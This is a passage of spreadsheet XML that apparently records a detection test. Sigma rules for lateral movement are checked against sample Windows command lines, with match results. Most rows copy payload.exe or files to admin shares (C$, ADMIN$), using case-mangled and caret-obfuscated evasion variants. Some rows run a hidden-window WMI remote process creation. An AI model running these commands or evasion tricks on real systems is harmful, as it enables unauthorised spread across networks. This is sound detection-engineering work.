          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135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35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C136" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D136" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E136" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C137" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D137" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E137" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J137" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C138" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D138" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E138" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J138" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B139" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C139" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D139" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E139" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F139" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J139" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C140" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D140" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E140" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J140" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C141" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D141" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E141" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J141" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C142" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D142" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E142" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J142" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B143" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C143" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D143" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E143" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J143" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C144" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D144" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E144" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J144" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C145" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D145" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E145" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J145" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C146" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D146" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E146" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J146" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B147" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C147" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D147" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E147" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J147" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C148" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D148" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E148" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J148" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C149" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D149" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E149" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J149" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C150" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D150" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E150" s="36" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C151" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D151" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E151" s="36" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J151" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C152" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D152" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E152" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J152" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C153" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D153" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E153" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J153" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B154" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C154" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D154" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E154" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I154" s="43" t="n"/>
      <c r="J154" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C155" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D155" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E155" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WiNdoWsTYle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I155" s="36" t="n"/>
      <c r="J155" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C156" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D156" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E156" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WINdowstyle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I156" s="36" t="n"/>
      <c r="J156" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C157" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D157" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E157" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WIndowsTyLe Hidden -cOMMAnd "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I157" s="36" t="n"/>
      <c r="J157" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C158" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D158" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E158" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I158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58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C159" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D159" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E159" s="36" t="inlineStr">
        <is>
